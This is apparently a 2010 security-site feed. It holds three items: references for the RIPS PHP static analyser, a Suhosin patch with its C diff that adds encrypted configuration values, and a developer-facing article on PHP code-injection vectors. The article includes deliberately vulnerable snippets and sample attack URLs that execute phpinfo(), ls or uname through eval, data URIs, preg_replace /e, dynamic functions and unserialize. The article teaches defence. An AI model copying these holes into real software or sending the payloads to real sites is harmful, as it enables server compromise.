  5. The PHP Group, token get all – Split given source into PHP tokens
    http://www.php.net/token-get-all
  6. The PHP Group, token name – Get the symbolic name of a given PHP token
    http://www.php.net/token-name
  7. The PHP Group, Execution Operators
    http://php.net/manual/en/language.operators.execution.php
  8. The PHP Group, Control Structures
    http://php.net/manual/en/language.control-structures.php
  9. The PHP Group, List of Parser Tokens
    http://php.net/manual/en/tokens.php
  10. Nenad Jovanovic, Christopher Kruegel, Engin Kirda, Pixy: A Static Analysis Tool
    for Detecting Web Application Vulnerabilities (Short Paper)
    http://www.seclab.tuwien.ac.at/papers/pixy.pdf
  11. Nenad Jovanovic, Christopher Kruegel, Engin Kirda, Pixy: A Static Analysis Tool
    for Detecting Web Application Vulnerabilities (Technical Report)
    http://www.seclab.tuwien.ac.at/papers/pixy_techreport.pdf
  12. Nenad Jovanovic, Christopher Kruegel, Engin Kirda, Precise Alias Analysis for
    Static Detection of Web Application Vulnerabilities
    http://www.iseclab.org/papers/pixy2.pdf
  13. Davide Balzarotti, Marco Cova, Vika Felmetsger, Nenad Jovanovic, Engin Kirda,
    Christopher Kruegel, Giovanni Vigna, Saner: Composing Static and Dynamic Analysis to Validate Sanitization inWeb Applications
    http://www.iseclab.org/papers/oakland-saner.pdf
  14. OWASP, OWASP SWAAT Project
    http://www.owasp.org/index.php/Category:OWASP_SWAAT_Project

[PDF Version]  [Download RIPS]

]]>
http://php-security.org/2010/05/24/mops-submission-09-rips-a-static-source-code-analyser-for-vulnerabilities-in-php-scripts/feed/ 0
MOPS Submission 08: Configuration Encryption Patch for Suhosin http://php-security.org/2010/05/22/mops-submission-08-configuration-encryption-patch-for-suhosin/ http://php-security.org/2010/05/22/mops-submission-08-configuration-encryption-patch-for-suhosin/#comments Sat, 22 May 2010 07:57:24 +0000 admin http://php-security.org/?p=331 Today it is time to present you the eighth external MOPS submission. It is an article by Juergen Pabel describing a new feature for the Suhosin Extension that allows encrypting configuration strings.

Configuration Encryption Patch for Suhosin

Juergen Pabel, 2010-04-18

Motivation

Passwords stored in configuration files pose a significant risk for application owners. Before delving into technical solutions it should be noted why it is important to employ an additional layer of protection to restrict access to such authentication credentials. The first aspect to consider is the threat impact in case of unauthorized access: for most scenarios these credentials facilitate “unrestricted” (with respect to application data and/or functionality) access to respective backend systems. The second factor in determining the respective risk is the likelihood of the threat: naturally, access to these configuration files should be limited to personal assigned to operating the application and computer system. However, the involved headcount for such operational personal varies largely. Smaller companies usually rely on one or two administrators while large corporations distribute these responsibilities amoung various teams: operating system administrators, application administrators, application operators and application support teams. It is also not uncommon for those teams to be comprised of company employees, service providers and even independant subcontractors. Limiting access to configuration files by setting restrictive file access permissions is surely a good start but will likely be an incomplete solution as some level of access to configuration files is often technically required. Thus, another approach is required to maintain the confidentiality for those authentication credentials. Encrypting the authentication credentials is a reasonable approach, although it should be noted that this does not implement wholistic protection: the application must access the decrypted authentication credentials in order to use them for authentication with backend systems. Hence, the decryption key must be accessible to the application in order to decrypt such encrypted configuration values. Any dedicated attacker will likely be able to obtain access to both the encrypted configuration values and the decryption key (which must be stored somewhere itself). However, it is still important to employ such a protection scheme: it prevents opportunistic and spontanious attacks like shoulder surfing. Some secondary consequences are that it might be easier to fend off potential accusations of negligence and in criminal prosecutions it might also be used to demonstrate deliberate and malicious intent. It is under these objectives that the presented feature addition to the Suhosin extension should be assessed.

Concept

Unlike most other programming languages it is common for PHP software to integrate the configuration files into applications; configuration files are usually implemented as PHP files that are executed as part of the application and contain configurative variable assignments. For simplicity, these files are referred to as “configuration scripts”.

Two new PHP functions are added to the Suhosin PHP extension: secureconfig_encrypt() and secureconfig_decrypt(). These functions implement the cryptographic operations and require a single string parameter each while returning the encrypted or decrypted result as a string. The secureconfig_decrypt() function is intended to be used within configuration scripts like so:

    $db_password = secureconfig_decrypt("Bdm9YyeumSFwGRBnn7eDRq3i896SSfzLO6bcD2yAFXY=");

Accordingly, the function secureconfig_encrypt() might be used for encrypting the plaintext configuration value (like authentication credentials). A simple encryptor tool could be implemented as follows:

    <?php
            echo "Please enter password: ";
            $stdin = fopen ("php://stdin","r");
            $pass = fgets($stdin);
            fclose($stdin);
            echo "Encrypted value: " . secureconfig_encrypt($pass);
    ?>

The as of yet undiscussed aspect is the cryptographic key; it must be defined in php.ini (or its included sub-configuration files). The cryptographic key must be specified in the Suhosin configuration file:

    suhosin.secureconfig.cryptkey = "secret"

The specified value’s SHA-256 digest is generated and used as the key for AES-256 processing. AES-256 is currently the only implemented cipher but any other cryptographic algorithm could be added later on – although such an enhancement would require an additional configuration value for specifying the to be used cryptographic algorithm (and of how many bits the cryptographic key of that cipher must consist).

Implementation

The Suhosin extension version 0.9.31 (the most recent release as of this writing) was used as the base for implementing the described feature. A new file (secureconfig.c) was added and the neccessary build and runtime-initialization references were included in the relevant files (config.m4, config.w32 and suhosin.c). In addition to the new PHP functions the source file secureconfig.c contains the runtime-initialization function suhosin_hook_secureconfig() for registering both newly implemented functions with the PHP runtime engine. The implementation of both suhosin_secureconfig_encrypt() and suhosin_secureconfig_decrypt() are unexpectably trivial; parameters are obtained from the PHP engine by calling zend_parse_parameters() and passed to suhosin_encrypt_string() and suhosin_decrypt_string() respectively for cryptographic processing along with the cryptographic key obtained from the PHP.ini configuration.

The cryptographic proccessing implemented in suhosin_encrypt_string() and suhosin_decrypt_string() calls for a more in-depth analysis. The first aspect to note is the adapted block cipher mode: it employs AES-256 in cipher-block chaining mode (CBC) without the use of an initialization vector (the first block is processed as in ECB mode). Although this practise is cryptographically worrisome because it renders the first encrypted block (16 bytes for AES) susceptible to some cryptographic attacks it’s extremely unlikely that this modification impacts the effective security for the presented feature*. Because the resulting ciphertext is originally intended to be stored in HTTP cookies the existing Suhosin functions employ a modified base64 encoding alphabet; all HTTP relevant characters are cautiously replaced with safer alternatives (“/”, “=” and “+” are mapped to “-”, “.” and “_” respectively). The newly implemented functions undo these transformations in order to employ a standard base64 encoding.

Albeit functionally irrelevant for this enhancement, it should be mentioned that any plaintext passed to suhosin_encrypt_string() is concatonated with the IP address of the client (it is obviously assumed that these functions are only calledin the context of HTTP cookies). The decryption function suhosin_decrypt_string() accepts besides the obvious ciphertext parameter an additional boolean parameter that controls whether the contained IP address must match the client IP address in the current context (again, assuming a HTTP request) in order to return the decrypted plaintext. Obviously, this parameter is set to false in suhosin_secureconfig_decrypt().

* A different conclusion might possibly be drawn for the original intent of suhosin_encrypt_string() and suhosin_decrypt_string(): to encrypt HTTP cookie data.

Download the patch here. The patch will be integrated into the official Suhosin Extension in the next week.

diff -Naur suhosin-0.9.31.org/config.m4 suhosin-0.9.31/config.m4
--- suhosin-0.9.31.org/config.m4    2010-03-28 22:43:13.000000000 +0200
+++ suhosin-0.9.31/config.m4    2010-04-18 15:56:25.000000000 +0200
@@ -5,5 +5,5 @@
 [  --enable-suhosin        Enable suhosin support])
 
 if test "$PHP_SUHOSIN" != "no"; then
-  PHP_NEW_EXTENSION(suhosin, suhosin.c crypt.c crypt_blowfish.c sha256.c memory_limit.c treat_data.c ifilter.c post_handler.c ufilter.c rfc1867.c log.c header.c execute.c ex_imp.c session.c aes.c compat_snprintf.c, $ext_shared)
+  PHP_NEW_EXTENSION(suhosin, suhosin.c crypt.c crypt_blowfish.c sha256.c memory_limit.c treat_data.c ifilter.c post_handler.c ufilter.c rfc1867.c log.c header.c execute.c ex_imp.c session.c aes.c compat_snprintf.c secureconfig.c, $ext_shared)
 fi
diff -Naur suhosin-0.9.31.org/config.w32 suhosin-0.9.31/config.w32
--- suhosin-0.9.31.org/config.w32   2010-03-28 22:43:13.000000000 +0200
+++ suhosin-0.9.31/config.w32   2010-04-18 15:56:25.000000000 +0200
@@ -4,7 +4,7 @@
 ARG_ENABLE("suhosin", "whether to enable suhosin support", "yes");
 
 if (PHP_SUHOSIN == "yes") {
-   EXTENSION("suhosin", "suhosin.c crypt.c crypt_blowfish.c sha256.c memory_limit.c treat_data.c ifilter.c post_handler.c ufilter.c rfc1867.c log.c header.c execute.c ex_imp.c session.c aes.c");
+   EXTENSION("suhosin", "suhosin.c crypt.c crypt_blowfish.c sha256.c memory_limit.c treat_data.c ifilter.c post_handler.c ufilter.c rfc1867.c log.c header.c execute.c ex_imp.c session.c aes.c secureconfig.c");
    if (PHP_SUHOSIN_SHARED) {
        ADD_SOURCES(configure_module_dirname, "crypt_win32.c crypt_md5.c", "suhosin");
    }
diff -Naur suhosin-0.9.31.org/php_suhosin.h suhosin-0.9.31/php_suhosin.h
--- suhosin-0.9.31.org/php_suhosin.h    2010-03-28 22:43:13.000000000 +0200
+++ suhosin-0.9.31/php_suhosin.h    2010-04-18 15:56:25.000000000 +0200
@@ -214,6 +214,8 @@
    long        cookie_checkraddr;
    HashTable *cookie_plainlist;
    HashTable *cookie_cryptlist;
+
+   char*   secureconfig_cryptkey;
   
    zend_bool   coredump;
    zend_bool   apc_bug_workaround;
@@ -329,6 +331,7 @@
 void normalize_varname(char *varname);
 int suhosin_rfc1867_filter(unsigned int event, void *event_data, void **extra TSRMLS_DC);
 void suhosin_bailout(TSRMLS_D);
+void suhosin_hook_secureconfig();
 
 /* Add pseudo refcount macros for PHP version < 5.3 */
 #ifndef Z_REFCOUNT_PP
diff -Naur suhosin-0.9.31.org/secureconfig.c suhosin-0.9.31/secureconfig.c
--- suhosin-0.9.31.org/secureconfig.c   1970-01-01 01:00:00.000000000 +0100
+++ suhosin-0.9.31/secureconfig.c   2010-04-18 16:20:33.000000000 +0200
@@ -0,0 +1,133 @@
+/*
+  +----------------------------------------------------------------------+
+  | Suhosin Version 1                                                    |
+  +----------------------------------------------------------------------+
+  | Copyright (c) 2006-2007 The Hardened-PHP Project                     |
+  | Copyright (c) 2007-2010 SektionEins GmbH                             |
+  +----------------------------------------------------------------------+
+  | This source file is subject to version 3.01 of the PHP license,      |
+  | that is bundled with this package in the file LICENSE, and is        |
+  | available through the world-wide-web at the following url:           |
+  | http://www.php.net/license/3_01.txt                                  |
+  | If you did not receive a copy of the PHP license and are unable to   |
+  | obtain it through the world-wide-web, please send a note to          |
+  | license@php.net so we can mail you a copy immediately.               |
+  +----------------------------------------------------------------------+
+  | Author: Juergen Pabel <jpabel@akkaya.de>                             |
+  +----------------------------------------------------------------------+
+*/
+
+#include <stdio.h>
+#include "php.h"
+#include "php_suhosin.h"
+#include "sha256.h"
+
+static char cryptkey[32];
+
+/* {{{ proto string secureconfig_encrypt(string plaintext)
+   Encrypt a configuration value using the configured cryptographic key */
+static PHP_FUNCTION(suhosin_secureconfig_encrypt)
+{
+   char *plaintext, *ciphertext;
+   int plaintext_len, ciphertext_len;
+   int i;
+   if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &plaintext, &plaintext_len) == FAILURE) {
+       return;
+   }
+   ciphertext = suhosin_encrypt_string(plaintext, plaintext_len, "", 0, cryptkey TSRMLS_CC);
+   if(ciphertext == NULL) {
+       return;
+   }
+   ciphertext_len = strlen(ciphertext);
+   /* undo suhosin_encrypt_string()'s base64 alphabet transformation */
+   for (i=0; i<ciphertext_len; i++) {
+       switch (ciphertext[i]) {
+           case '-': ciphertext[i]='/'; break;
+           case '.': ciphertext[i]='='; break;
+           case '_': ciphertext[i]='+'; break;
+       }
+   }
+   RETURN_STRINGL((char *)ciphertext, ciphertext_len, 1);
+}
+
+/* }}} */
+
+
+/* {{{ proto string secureconfig_decrypt(string ciphertext)
+   Decrypt a configuration value using the configured cryptographic key */
+static PHP_FUNCTION(suhosin_secureconfig_decrypt)
+{
+   char *plaintext, *ciphertext;
+   int plaintext_len, ciphertext_len;
+   int i;
+  
+   if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &ciphertext, &ciphertext_len) == FAILURE) {
+       return;
+   }
+
+   /* redo suhosin_encrypt_string()'s base64 alphabet transformation */
+   for (i=0; i<ciphertext_len; i++) {
+       switch (ciphertext[i]) {
+           case '/': ciphertext[i]='-'; break;
+           case '=': ciphertext[i]='.'; break;
+           case '+': ciphertext[i]='_'; break;
+       }
+   }
+   plaintext = suhosin_decrypt_string(ciphertext, ciphertext_len, "", 0, cryptkey, &plaintext_len, 0 TSRMLS_CC);
+   if(plaintext == NULL || plaintext_len <= 0) {
+       return;
+   }
+   RETURN_STRINGL((char *)plaintext, plaintext_len, 1);
+}
+
+/* }}} */
+
+
+/* {{{ suhosin_secureconfig_functions[]
+ */
+static function_entry suhosin_secureconfig_functions[] = {
+   PHP_NAMED_FE(secureconfig_encrypt, PHP_FN(suhosin_secureconfig_encrypt), NULL)
+   PHP_NAMED_FE(secureconfig_decrypt, PHP_FN(suhosin_secureconfig_decrypt), NULL)
+   {NULL, NULL, NULL}
+};
+/* }}} */
+
+
+void suhosin_hook_secureconfig()
+{
+   char* key;
+   suhosin_SHA256_CTX ctx;
+
+   TSRMLS_FETCH();
+  
+   /* check if we already have secureconfig support */
+   if (zend_hash_exists(CG(function_table), "secureconfig_encrypt", sizeof("secureconfig_encrypt"))) {
+       return;    
+   }
+
+   key = SUHOSIN_G(secureconfig_cryptkey);
+   if (key != NULL) {
+       suhosin_SHA256Init(&ctx);
+       suhosin_SHA256Update(&ctx, (unsigned char*)key, strlen(key));
+       suhosin_SHA256Final((unsigned char *)cryptkey, &ctx);
+   } else {
+       memset(cryptkey, 0x55 /*fallback key with alternating bits*/, 32);
+   }
+
+   /* add the secureconfig functions */
+#ifndef ZEND_ENGINE_2
+   zend_register_functions(suhosin_secureconfig_functions, NULL, MODULE_PERSISTENT TSRMLS_CC);
+#else
+   zend_register_functions(NULL, suhosin_secureconfig_functions, NULL, MODULE_PERSISTENT TSRMLS_CC);
+#endif
+}
+
+
+/*
+ * Local variables:
+ * tab-width: 4
+ * c-basic-offset: 4
+ * End:
+ * vim600: sw=4 ts=4 fdm=marker
+ * vim<600: sw=4 ts=4
+ */
diff -Naur suhosin-0.9.31.org/suhosin.c suhosin-0.9.31/suhosin.c
--- suhosin-0.9.31.org/suhosin.c    2010-03-28 22:43:13.000000000 +0200
+++ suhosin-0.9.31/suhosin.c    2010-04-18 15:56:25.000000000 +0200
@@ -956,6 +956,8 @@
    STD_ZEND_INI_BOOLEAN("suhosin.srand.ignore", "1", ZEND_INI_SYSTEM|ZEND_INI_PERDIR, OnUpdateMiscBool, srand_ignore,zend_suhosin_globals, suhosin_globals)
    STD_ZEND_INI_BOOLEAN("suhosin.mt_srand.ignore", "1", ZEND_INI_SYSTEM|ZEND_INI_PERDIR, OnUpdateMiscBool, mt_srand_ignore,zend_suhosin_globals,   suhosin_globals)
 
+   STD_PHP_INI_ENTRY("suhosin.secureconfig.cryptkey", "", PHP_INI_SYSTEM|PHP_INI_PERDIR, OnUpdateString, secureconfig_cryptkey, zend_suhosin_globals, suhosin_globals)
+
 PHP_INI_END()
 /* }}} */
 
@@ -1071,6 +1073,7 @@
    suhosin_hook_crypt();
    suhosin_hook_sha256();
    suhosin_hook_ex_imp();
+   suhosin_hook_secureconfig();
 
    /* register the logo for phpinfo */
    php_register_info_logo(SUHOSIN_LOGO_GUID, "image/jpeg", suhosin_logo, sizeof(suhosin_logo));
diff -Naur suhosin-0.9.31.org/suhosin.ini suhosin-0.9.31/suhosin.ini
--- suhosin-0.9.31.org/suhosin.ini  2010-03-28 22:43:13.000000000 +0200
+++ suhosin-0.9.31/suhosin.ini  2010-04-18 15:56:25.000000000 +0200
@@ -443,3 +443,10 @@
 ; .htaccess. The string "legcprsum" will allow logging, execution, get,
 ; post, cookie, request, sql, upload, misc features in .htaccess
 ;suhosin.perdir = "0"
+
+; Controls the cryptographic key with which configuration values can be
+; encrypted (and decrypted using (secureconfig_decrypt).
+; It is recommended that this default value should be replaced with a
+; randomly generated key (256 bit key encoded with base64).
+;suhosin.secureconfig.cryptkey = "MDEyMzQ1Njc4OWFiY2RlZjAxMjM0NTY3ODlhYmNkZWY="
+
]]>
http://php-security.org/2010/05/22/mops-submission-08-configuration-encryption-patch-for-suhosin/feed/ 0
MOPS Submission 07: Our Dynamic PHP – Obvious and not so obvious PHP code injection and evaluation http://php-security.org/2010/05/20/mops-submission-07-our-dynamic-php/ http://php-security.org/2010/05/20/mops-submission-07-our-dynamic-php/#comments Thu, 20 May 2010 20:01:40 +0000 admin http://php-security.org/?p=300 Today we want to present you the seventh external MOPS submission. It is an article about usual and unusual PHP code execution vulnerabilities sent in by Arthur Gerkis.

Our Dynamic PHP

Obvious and not so obvious PHP code injection and evaluation

Arthur Gerkis, 2010-04-17

Table of Contents

1. Abstract

We all know that PHP is a language that allows entering programmers with low coding skills and as a rule with poor knowledge of basic security concepts. This factor often leads to new poorly written web-applications thus compromising servers which host them. While such applications are widespread, today we have some core of well-known web-applications, which are possibly more secure. “Possibly” is because of their history of bugs and security holes. Nevertheless, today common PHP application security is growing increasingly and we can say thanks for this to security researchers’ investigation, robust web application frameworks, PHP interpreter maturity and solutions like “Suhosin” patch.

Such vulnerabilities like SQL injections, cross-site scripting, cross-site request forgery, local/remote file inclusions, directory traversal and others are well-known, some of them become instinct and some of them are given new live and power due to newly discovered security flaws. But as we might notice from security bug-tracks, there still remain some things developers forgot about or even did not know. In this article I would like to focus attention of developers on PHP code execution (evaluation) in places which are less possible to meet and pieces of code that might look quite innocent while providing possibilities for attacker to evaluate their code. For completeness of observe I will mention also old, well-known security breaches.

2. Ways to Evaluate

There are a lot of different ways how to cause code evaluation. Several PHP built-in functions allow to change code dynamically by evaluating some expression, some tricky language constructions and specific PHP features can cause evaluation. So, eval() is not the only way and deeper in this article we will go through all of possibilities.

If vulnerability exists and attacker knows the source code, then only result should be checked and this depends on what is the aim of attacker. But sometimes attacker cannot see result, this is so called “blind” code evaluation – this happens when code evaluates hidden. This does not decreases security risk, even more, in some cases it turns out to be very harmful. Attacker can use so-called “fuzzing”, brute-force method against target. And no one knows what will happen if one of brute-force enumerations succeeds. Anyway, any unpredicted code evaluation is not acceptable.

I will start from most frequent and obvious PHP code inclusion cases going deeper till things that someone could not guess.

2.1. Well-known cases

2.1.1. Evaluating eval()

The most first case is PHP construction that was directly meant for evaluation- eval(). Usually web-developers want to evaluate desired code with some dynamic changes. Such approach is often used in template or plugin systems. While it looks quite obvious to be insecure, today there are still a lot of applications that are prone to this kind of vulnerability – it happens to be really tricky to check and filter all the possibilities. What about practical exposure – look at the following lines:

<?php
eval("echo $foobar;");
?>

In this case variable will be treated as PHP code, so contents of $foobar will be evaluated.

<?php
eval('echo $foobar;');
?>

In second one value of $foobar will be simply echoed. So, if your intention was second case, there is no reason to use double quotes. And do not forget, that variable that was created during eval() call, will remain visible to all native code. In several circumstances this can posess security risk

How it was said, it is hard to make perfect escaping for eval(). There are no functions that can help to properly escape input spcially for eval() – there are simply too much possibilities what can and should be happen on the flow. It is dynamic code “feature”. If there is no way to avoid eval(), try to use string literals, avoid interpolation of variables. When there is need of variable interpolation, then it should be initialized. Also good approach to catch the moment and identify that something has went wrong is to use own error handler.

2.1.2. Code Inclusion

File inclusion vulnerabilities were also the most popular and dangerous. File could be included into initial PHP script by following statements:

  • include(), include_once()
  • require(), require_once()

File that has been included will be interpreted as PHP source code.

There are two categories of this attack – local file inclusion called LFI and remote file inclusion, as you can guess, RFI (further explanation see in reference Nr.2). Today web-developers became more accurate, but still LFI/RFI sometimes happens. Best way to be preserved from this kind of attack is to avoid using dynamic paths. If this is not possible, then the usage of this should be limited and checked by the list of allowed files to be included. Also try to use full path rather than partial. But if the PHP directive include path is able to be modified, you can never know where the script with defined partial path comes from. Good approach is to use file inclusion as follows:

<?php
define('APP_PATH', '/var/www/htdocs/');
require_once(APP_PATH . 'lib.php');
?>

However, existence of local or remote file is not always required. If it is possible to use remote including then attacker can use embedded code in URL. The talk is about “data URI”, is defined in RFC 2397. Consider we have vulnerable site and it uses such file inclusion:

http://www.example.com/index.php?file=page1

We can guess that following code is used to include files:

<?php
$to_include = $_GET['file'];
require_once($to_include . '.html');
?>

And now imagine that attacker changes value of variable “file” to following:

http://www.example.com/index.php?file=data:text/plain,<?php phpinfo();?>%00

This will merely lead to PHP code execution. Thus, today LFI can easily be converted to remote code execution (RCE) in one way more. This new data protocol has appeared in PHP 5.2.0 and in older versions will not work. Also PHP will argue and would not allow to use it if allow_url_include=off. Excessive information about “data URI” is possible to get in references Nr. 3 and Nr.4.

Sure, there remain other possibilities how PHP code can be injected and later evaluated – via apache log files, using “/proc” and others. As for example, see references Nr. 5 and Nr.6. There is good explanation of different techniques to exploit this sort of vulnerability. Without doubt, inappropriate usage of functions like file_get_contents(), readfile(), input wrappers like php://input and others is a threat. We will not discuss them because of their secondary prevalence. Besides, they abide the same filtration rules as for all other input.

2.2. Regular Expression

Another one popular case is code evaluation in regular expression (“regexp” further). Regexps are used widely because it is often easier to write regexp than to work with several string parsing functions. It saves place and time.
Since PHP has support of PCRE (Perl Compatible Regular Expressions) there is available “e (PREG_REPLACE_EVAL)” modifier in regexp for one function – preg_replace(). When match is found, then it will be evaluated. Look at the following code:

<?php
$var = '<tag>phpinfo()</tag>';
preg_replace("/<tag>(.*?)<\/tag>/e", 'addslashes(\\1)', $var);
?>

Most likely, intension of developer was sanitization of input with addslashes(). But attacker’s thoughts do not coincide. Here phpinfo() would execute.

However, even if there is no “e” modifier sometimes attackers still have possibility to evaluate code. It can be achieved by dropping off some part of regexp by putting null-byte into it. Let’s look at the same example, but a little bit modified:

<?php
$regexp = $_GET['re'];
$var = '<tag>phpinfo()</tag>';
preg_replace("/<tag>(.*?)$regexp<\/tag>/", '\\1', $var);
?>

Maybe this example looks too naive, but currently aim is to show when null-byte attack could work. Now consider that vulnerable script accepts request like this:

http://www.example.com/index.php?re=<\/tag>/e%00

This would modify original regular expression and make code to evaluate. With magic_quotes_gpc=on this would not work anymore. However, it was decided to remove this directive in PHP version 6.0 because it has brought a lot of problems to web-developers. Proper input filtration is not the work of PHP interpreter, only web-developer is responsible for this.

Double quotes should not be used without need, safer is to use single quotes. If possible, then usage of similar function, preg_replace_callback(), is better. The difference is only in call of callback function instead of replacement. And again, beware of callback if it has impact outside from PHP. One of filtration methods is using function preg_quote(). It would escape regex special characters thus saving us from confusion.

2.3. Dynamic Code

By dynamic code here is meant everything that can change normal code execution flow – dynamic variables (variable variables), new functions creation on the fly and complex curly syntax.

2.3.1. Dynamic Variables

PHP allows programmer to use “variable variables” in their code. In this case name of variable is set dynamically. Sometimes to preserve compatibility with old code and due to unavailability to modify previous source, programmers (bad programmers) uses such register_globals=on imitation:

<?php
foreach ($_GET as $key => $value) {
   $$key = $value;
}
// ... some code
if (logged_in() || $authenticated) {
   // ... administration area
}
?>

This could be convenient not only to beginners or lazy coders, but also attacker. Imagine that attacker provides such string to application:

http://www.example.com/index.php?authenticated=true

In combination with insufficient authentication check as shown in example (what is like a rule in applications with vulnerabilities of such level) it would give access to restricted area.
While such approach became part of history, it still happens to see such code in applications. Values should be initialized and scope of variables should be overlooked. By default register_globals was switched off in PHP 4.2.0 and will be removed in 6.0 PHP.

2.3.2. Dynamic Functions

This could be most popular case of vulnerability within this category. It is possible to create dynamic functions at least in two ways. First is as follows:

<?php
$dyn_func = $_GET['dyn_func'];
$argument = $_GET['argument'];
$dyn_func($argument);
?>

Or, if register_globals=on then previous code is equal to foregoing:

<?php
$dyn_func($argument);
?>

And if we call script such way:

http://www.example.com/index.php?dyn_func=system&argument=uname

Here variable $dyn_func becomes name of function and $argument is argument. It should be clear what it could end up with.

In second case it is possible to exploit this code even without function name. With create_function() it is possible to create anonymous function, that will execute second argument as contents of new function. Example of vulnerable code:

<?php
$foobar = $_GET['foobar'];
$dyn_func = create_function('$foobar', "echo $foobar;");
$dyn_func('');
?>

Then following request would give out result of system command “ls” execution:

http://www.example.com/index.php?foobar=system('ls')

If to compare to eval(), then it would look something like this:

<?php
eval("function lambda_n() { echo system('ls'); }");
lambda_n();
?>

Reason for this is that create_function() function is simply PHP internal wrapper that uses eval.

2.3.3. Curly syntax

Complex curly syntax was meant to separate code from strings, actually, embed it. As in PHP manual pages written, “complex” means that it would allow to use complex expressions. Usually developers use that functionality such way:

<?php
$year = "10";
$foobar = "That was 20{$year}-th year.";
?>

This way it is possible to merge text in strings with variable values. And now imagine this case:

<?php
$var = "I was innocent until ${`ls`} appeared here";
?>

Here system command “ls” will be executed. But why this has happened? The thing is that code between curly braces will be evaluated and result will replace {`ls`} thus creating variable. That is why if we run this code, PHP would be complaining of undefined variable that consists of directory listing. The same case as if it was:

<?php
eval("$foo");
?>

Here “foo” is result of command “ls” (as a string). And something crazy like this will also work:

<?php
$foobar = 'phpinfo';
${'foobar'}();
?>

Whilst this does not posess any security risk when used alone, curly syntax can help to evade in preg_replace() and other places when code is mixed with strings. Most exploits that uses regexp vulnerability are using this trick.

2.4. Rare but possible cases

This might not be so spread pitfall of web-developers due to different kind of usage of following functions. In this case it is often not required to interact with user input so actively as in previous examples. But anyway, because these functions are too many they are worth mention.

ob_start() function can take argument as callback function that will be executed when output buffer is flushed. Contents of that was printed out will be passed to callback function as argument. Usually output buffering is used for data compression that is passed back to browser. Let’s consider following malicious usage:

<?php
$foobar = 'system';
ob_start($foobar);
echo 'uname';
ob_end_flush();
?>

In case if $foobar is controllable then it would execute system command “uname”.

Function assert() is also easy to exploit as eval(), but it is not so common security hole. It
accepts string as argument that will be evaluated. The following code has the same effect as previous:

<?php
$foobar = 'system("uname")';
assert($foobar);
?>

This function should be used in development code to help in debugging. And still developers often abuses usage of assert().

Developers can use array functions to apply some list of properties to data or vice versa. In most cases applying functions are predefined, so this vulnerability is also not so popular in the wild. Anyway, it is still worth mention due to potential possibilities:

  • array_map()
  • usort(), uasort(), uksort()
  • array_filter()
  • array_reduce()
  • array_diff_uassoc(), array_diff_ukey()
  • array_udiff(), array_udiff_assoc(), array_udiff_uassoc()
  • array_intersect_assoc(), array_intersect_uassoc()
  • array_uintersect(), array_uintersect_assoc(), array_uintersect_uassoc()
  • array_walk(), array_walk_recursive()

As example let’s take one function of this list and exploit it:

<?php
$evil_callback = $_GET['callback'];
$some_array = array(0, 1, 2, 3);
$new_array = array_map($evil_callback, $some_array);
?>

Now attacker passes this to browser:

http://www.example.com/index.php?callback=phpinfo

As a result, callback defined by attacker was applied to the whole array and he will get phpinfo() executed.

In continue of functions that use callbacks we can mention XML Parser functions. By default these functions are enabled in PHP:

  • xml_set_character_data_handler()
  • xml_set_default_handler()
  • xml_set_element_handler()
  • xml_set_end_namespace_decl_handler()
  • xml_set_external_entity_ref_handler()
  • xml_set_notation_decl_handler()
  • xml_set_processing_instruction_handler()
  • xml_set_start_namespace_decl_handler()
  • xml_set_unparsed_entity_decl_handler()

Some other often used functions that were not mentioned but also uses callbacks:

  • stream_filter_register()
  • set_error_handler()
  • register_shutdown_function()
  • register_tick_function()

Here were mentioned functions that might appear in applications, but there still remains huge amount of undocumented, deprecated functions, extensions that uses callback functions or otherwise let generate dynamic code. It is nearly impossible to remember them all. Moreover, they can appear and disappear in different PHP releases. So, easier and safer way is to properly sanitize input and to think about what can influence the value of callback as argument.

2.5. Miscellaneous and not the last

We have discussed a lot of possibilities of how evil code can be injected into native one. But the game is not over. It should not be also forgotten about some complicated cases that are related to bugs of PHP interpreter itself and several conjunctures. Until such bug is not discovered and publicly disclosed, fails everyone.

One bright example is relatively recently discovered insecure behavior of unserialize() function with combination of classes destructors. In short, if we unserialize object of some class, then __destruct() of this class will be called. If it is possible to send specially crafted serialized string, then attacker is able to execute arbitrary code. Some oversimplified example:

<?php
class Example {
   var $var = '';
   function __destruct() {
      eval($this->var);
   }
}
unserialize($_GET['saved_code']);
?>

And the following link would execute desired code, in our case, phpinfo():

http://www.example.com/index.php?saved_code=O:7:"Example":1:{s:3:"var";s:10:"phpinfo();";}

Sure, there are some circumstances needed that would allow to pass this string to object methods and it is not so easy to find exploitable place, but there are exploits in the wild based on this behavior. So, it should be taken into account. For better and original explanation of this vulnerability look reference Nr.7.

3. To sum up

As you see, this problem is rather actual. If you decided to allow user to embed some code then think of such embedded code as if it were always executing dangerous functions – simply never trust user and even administrator. It is very hard to correctly escape user input because there always remains possibility that something has been forgotten. That is why using blacklists is generally bad idea. Much easier and safer is to define whitelist of allowed functions, tags, whatever you wish to allow for input. However this is not also a guarantee of security. More static code – more safety.

If you are about writing portable and secure code, then never rely on PHP configuration – it could change every time your application leaves development platform. As for example, if your PHP is configured with safe_mode=on, magic_quotes_gpc=on, register_globals=off and etc., it does not mean that application will remain always bulletproof and stable. If in PHP 5.0 Zend Engine developer forces were concentrated on OOP, then in PHP 6.0 it is security, better support of Unicode and more configuration independent work. In article were mentioned some cases what will be removed in new PHP, so be ready for broken apps if you do not take into account those changes.

Maybe you have noticed, but everything that is convenient to developer turns out to be a security risk. That is some kind of pay for such properties that should make life easier. More static code you use, less possibilities to get exploited. We get one – faster development, but loose other – control over application. Beware of it.

4. References

#1 http://www.hardened-php.net/suhosin/ Suhosin, advanced protection system for PHP
#2 http://projects.webappsec.org/Remote-File-Inclusion explanation of RFI
#3 http://tools.ietf.org/html/rfc2397 The “data” URL scheme
#4 http://www.php.net/manual/en/wrappers.data.php Data (RFC 2397), PHP manual
#5 http://www.ush.it/2008/08/18/lfi2rce-local-file-inclusion-to-remote-code-execution-advanced- exploitation-proc-shortcuts/ how LFI can lead to RCE
#6 http://www.exploit-db.com/papers/260 how LFI can lead to RCE (2)
#7 http://www.sektioneins.com/en/advisories/index.html unserialize() based advisories and many others
]]>
http://php-security.org/2010/05/20/mops-submission-07-our-dynamic-php/feed/ 0
